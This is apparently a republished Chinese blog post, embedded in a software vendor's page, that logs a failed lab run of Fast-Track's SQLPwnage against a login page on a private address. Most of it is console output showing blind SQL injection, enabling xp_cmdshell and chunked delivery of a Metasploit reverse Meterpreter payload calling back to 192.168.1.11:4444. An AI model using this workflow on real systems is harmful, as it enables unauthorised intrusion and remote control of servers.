许可优化
许可优化
产品
产品
解决方案
解决方案
服务支持
服务支持
关于
关于
软件库
当前位置:服务支持 >  软件文章 >  FastTrack的SQLPwnage漏洞利用失败分析

FastTrack的SQLPwnage漏洞利用失败分析

阅读数 2
点赞 0
article_banner

这次也是失败的,操作如下:


root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i
Fast-Track Main Menu:

    1.  Fast-Track Updates
    2.  Autopwn Automation
    3.  Nmap Scripting Engine
    4.  Microsoft SQL Tools
    5.  Mass Client-Side Attack
    6.  Exploits
    7.  Binary to Hex Payload Converter
    8.  Payload Generator
    9.  Fast-Track Tutorials
    10. Fast-Track Changelog
    11. Fast-Track Credits
    12. Exit Fast-Track

    Enter the number: 4

Microsoft SQL Attack Tools

    1. MSSQL Injector
    2. MSSQL Bruter
    3. SQLPwnage

    (q)uit

    Enter your choice : 3

    SQLPwnage Main Menu:

    1. SQL Injection Search/Exploit by Binary Payload Injection (BLIND)
    2. SQL Injection Search/Exploit by Binary Payload Injection (ERROR BASED)
    3. SQL Injection single URL exploitation

    <ctrl>-c to Cancel

    Enter your choice: 1
Scan a subnet or spider single URL?

        1. url 
        2. subnet (new)
        3. subnet (lists last scan)

        Enter the Number: 1

Enter IP address (ex: www.xxxxx.com): http://192.168.1.109/login.jsp
http://192.168.1.109/login.jsp
50000
Crawling http://192.168.1.109/login.jsp (Max Depth: 50000)
DONE
Found 0 links, following 0 urls in 0+0:0:0

Spidering is complete.

*************************************************************************
http://192.168.1.109/login.jsp
*************************************************************************


[+] Number of forms detected: 2 [+]


What type of payload do you want?

1. Custom Packed Fast-Track Reverse Payload (AV Safe)
2. Metasploit Reverse VNC Inject (Requires Metasploit)
3. Metasploit Meterpreter Payload (Requires Metasploit)
4. Metasploit TCP Bind Shell (Requires Metasploit)

Select your choice: 3
Enter the port you want to listen on: 4444
[+] Importing 64kb debug bypass payload into Fast-Track... [+]
[+] Import complete, formatting the payload for delivery.. [+]
[+] Payload Formatting prepped and ready for launch. [+]
[+] Executing SQL commands to elevate account permissions. [+]
[+] Initiating stored procedure: 'xp_cmdhshell' if disabled. [+]
[+] Delivery Complete. [+]
Launching MSFCLI Meterpreter Handler
Creating Metasploit Reverse Meterpreter Payload..
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.1.11", "LPORT"=>"4444"}
Taking raw binary and converting to hex.
Raw binary converted to straight hex.
[+] Bypassing Windows Debug 64KB Restrictions. Evil. [+]
[+] Sending chunked payload. Number 1 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 2 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 3 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 4 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 5 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 6 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 7 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 8 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 9 of 9. This may take a bit. [+]
[+] Conversion from hex to binary in progress. [+]
[+] Conversion complete. Moving the binary to an executable. [+]
[+] Splitting the hex into 100 character chunks [+]
[+] Split complete. [+]
[+] Prepping the payload for delivery. [+]
Sending chunk 1 of 15, this may take a bit...
Sending chunk 2 of 15, this may take a bit...
Sending chunk 3 of 15, this may take a bit...
Sending chunk 4 of 15, this may take a bit...
Sending chunk 5 of 15, this may take a bit...
Sending chunk 6 of 15, this may take a bit...
Sending chunk 7 of 15, this may take a bit...
Sending chunk 8 of 15, this may take a bit...
Sending chunk 9 of 15, this may take a bit...
Sending chunk 10 of 15, this may take a bit...
Sending chunk 11 of 15, this may take a bit...
Sending chunk 12 of 15, this may take a bit...
Sending chunk 13 of 15, this may take a bit...
Sending chunk 14 of 15, this may take a bit...
Sending chunk 15 of 15, this may take a bit...
Using H2B Bypass to convert our Payload to Binary..
Running cleanup before launching the payload....
[+] Launching the PAYLOAD!! This may take up to two or three minutes. [+]
You should have a shell if everything went good..Might take a couple seconds


   这个也要在图形界面下运行才行,除非修改代码。 
  

操作失败了,原因和上次一样:

在XP上生成的h2b. exe 无法运行。


免责声明:本文系网络转载或改编,未找到原创作者,版权归原作者所有。如涉及版权,请联系删


相关文章
技术文档
QR Code
微信扫一扫,欢迎咨询~
customer

online

联系我们
武汉格发信息技术有限公司
湖北省武汉市经开区科技园西路6号103孵化器
电话:155-2731-8020 座机:027-59821821
邮件:tanzw@gofarlic.com
Copyright © 2023 Gofarsoft Co.,Ltd. 保留所有权利
遇到许可问题?该如何解决!?
评估许可证实际采购量? 
不清楚软件许可证使用数据? 
收到软件厂商律师函!?  
想要少购买点许可证,节省费用? 
收到软件厂商侵权通告!?  
有正版license,但许可证不够用,需要新购? 
联系方式 board-phone 155-2731-8020
close1
预留信息,一起解决您的问题
* 姓名:
* 手机:

* 公司名称:

姓名不为空

姓名不为空

姓名不为空
手机不正确

手机不正确

手机不正确
公司不为空

公司不为空

公司不为空